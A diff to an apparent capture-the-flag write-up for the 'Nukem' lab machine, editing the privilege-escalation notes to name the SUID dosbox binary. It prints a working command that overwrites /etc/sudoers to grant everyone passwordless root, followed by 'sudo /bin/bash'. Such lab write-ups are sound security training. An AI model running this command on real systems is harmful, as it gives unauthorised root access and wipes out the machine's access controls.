rossSec/rossSec.github.io/_posts/2023-05-15-PG-Practice-Nukem-Writeup.md

 ```

 ## Privesc:
-The way to root on this machine was relatively simple, you overwrite the /etc/sudoers file using a vulnerable SUID bit.
-This suid can also be located on GTFOBins.
+The way to root on this machine was relatively simple, you overwrite the /etc/sudoers file using a vulnerable SUID bit ```/usr/bin/dosbox```.
+This SUID's exploit can also be located on GTFOBins.
 ```
 /usr/bin/dosbox -c 'mount c /' -c "echo ALL ALL=(ALL) NOPASSWD: ALL > c:\etc\sudoers" -c exit
 sudo /bin/bash